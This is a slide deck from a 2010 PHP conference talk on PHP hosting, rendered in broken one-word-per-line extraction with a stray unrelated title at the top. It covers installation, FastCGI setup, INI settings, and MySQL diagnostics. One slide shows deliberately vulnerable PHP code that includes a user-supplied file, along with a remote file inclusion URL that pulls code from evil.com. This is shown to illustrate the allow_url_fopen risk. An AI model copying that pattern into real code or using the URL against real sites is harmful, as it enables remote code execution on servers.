DevoxxFR 2024 Reproducible Builds with Apache Maven
Php through the eyes of a hoster pbc10
1. PHP
through
the
eyes
of
a
hoster
Thijs
Feryn
Support
manager
+32
(0)9
218
79
06
thijs@combellgroup.com
PHP
Barcelona
Conference
Saturday
October
30th
2010
Barcelona
Spain
11. Goals
&
moKves
Our
goals
&
mo]ves
are
the
same
as
yours:
• It
has
to
work
• It
has
to
perform
• It
has
to
scale
• It
has
to
be
secure
• It
has
to
be
available
17. Installing
using
a
package
manager
(APT/ApKtude)
Install
PHP:
Install
MySQL
library
for
PHP:
server$
apt-‐get
install
php5
server$
apt-‐get
install
php5-‐mysql
18. SAPI
...
schmapi
Mod_php FastCGI CLI
Web Apache
module gateway -‐
Process Apache
process php-‐cgi php
Configura]on Apache
conf
files wrapper on
the
fly
User Apache
user
shell
user
or
suexec
user
shell
user
19. FastCGI
Example
config:
• Apache
handler
<IfModule
mod_fcgid.c>
SuexecUserGroup
dev
dev
PHP_Fix_Pathinfo_Enable
1
<Directory
/var/www/dev/www/>
Options
+ExecCGI
AllowOverride
All
AddHandler
fcgid-‐script
.php
FCGIWrapper
/var/www/dev/etc/fcgi.wrapper
.php
Order
allow,deny
Allow
from
all
</Directory>
</IfModule>
22. INI
seQngs:
tales
of
good
&
evil
Defining
INI
se<ngs:
• Php.ini
• Ini_set()
• “-‐d”
• php_value
• php_flag
• php_admin_value
• php_admin_flag
23. INI
seQngs:
tales
of
good
&
evil
Memory_limit:
Fatal
error:
Allowed
memory
size
of
16777216
bytes
exhausted
(tried
to
allocate
35
bytes)
24.
25. INI
seQngs:
tales
of
good
&
evil
Safe_mode
&
Open_basedir:
<IfModule
mod_php5.c>
php_admin_flag
engine
on
php_admin_flag
safe_mode
off
php_admin_value
open_basedir
"/var/www/vhosts/
website.com/httpdocs:/tmp"
</IfModule>
26. INI
seQngs:
tales
of
good
&
evil
Allow_url_fopen:
<?php
$lang= $_GET['lang'];
require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?
29. PHP
4:
End
of
life,
but
far
from
dead
Parse
error:
syntax
error,
unexpected
T_STRING,
expecting
T_OLD_FUNCTION
or
T_FUNCTION
or
T_VAR
or
'}'
in
test.php
on
line
4
62. mysql>
explain
SELECT
field1,
(SELECT
COUNT(*)
FROM
table2
WHERE
field3
=
table1.id)
FROM
table1
WHERE
field2
=
1
ORDER
BY
field4
DESC
limit
12,12;
***************************
1.
row
***************************
id:
1
select_type:
PRIMARY
table:
table1
type:
ALL
possible_keys:
approved
key:
approved
key_len:
NULL
ref:
NULL
rows:
3143
Extra:
Using
where;
Using
filesort
***************************
2.
row
***************************
id:
2
select_type:
DEPENDENT
SUBQUERY
table:
table2
type:
ALL
possible_keys:
NULL
key:
NULL
key_len:
NULL
ref:
NULL
rows:
1005
Extra:
Using
where
63. mysql>
show
processlist;
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
|
Id
|
User
|
Host
|
db
|
Command
|
Time
|
State
|
Info
|
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
|
63515
|
root
|
localhost
|
db
|
Query
|
0
|
NULL
|
show
processlist
|
|
81763
|
root
|
localhost
|
db
|
Sleep
|
105
|
|
NULL
|
|
85187
|
root
|
localhost
|
db
|
Query
|
0
|
Sending
data
|
SELECT
data
from
someTable
where
field
=
'val'
|
|
82701
|
root
|
localhost
|
db
|
Query
|
0
|
Copying
to
tmp
table
|
SELECT
data
from
someTable
where
field='val2'
|
|
82709
|
root
|
localhost
|
db
|
Query
|
0
|
Sorting
result
|
SELECT
data
from
someTable
where
order
by
field
|
|
82716
|
root
|
localhost
|
db
|
Query
|
0
|
Opening
tables
|
SELECT
data
from
someOtherTable
|
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
71. Summary
1.Hosters
are
a
genuine
stakeholder
in
the
PHP
universe
2.PHP
is
highly
flexible
&
configurable.
Hosters
have
to
ensure
a
decent
setup
3.PHP
has
a
lot
to
offer
feature-‐wise
4.PHP
aOracts
a
crowd
and
brings
a
lot
of
people
together
from
different
industries
(e.g.
hosters)
5.Lots
of
abuse
cases
are
PHP
related,
but
that’s
not
the
fault
of
PHP
itself
6.PHP
itself
doesn’t
scale
*that*
well,
but
is
flexible
enough
to
ensure
scalability
via
extra
tools